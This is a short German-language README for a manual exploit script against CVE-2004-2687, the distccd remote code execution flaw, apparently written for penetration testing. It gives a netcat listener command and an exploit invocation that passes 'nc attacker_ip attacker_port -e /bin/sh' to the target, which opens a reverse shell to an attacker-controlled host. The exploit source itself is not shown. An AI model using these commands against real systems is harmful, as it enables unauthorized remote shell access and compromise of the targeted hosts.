
Manuelles Exploit-Skript für CVE-2004-2687 (distccd RCE), das eine Reverse-Shell über netcat ohne Metasploit erzeugt und auf entfernte Hosts für Penetrationstests abzielt.
Das Ziel dieses Skripts ist es, nicht Metasploit zu verwenden, sondern es manuell zu tun.
Verwendung:
nc -lvnp 4466
Ausführen des Exploits:
python3 ./exploit.py -t target_ip -p target_port -c "nc attacker_ip attacker_port -e /bin/sh"